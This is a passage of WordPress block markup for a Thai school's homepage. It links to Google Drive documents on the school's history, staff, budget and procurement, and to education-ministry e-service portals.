data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 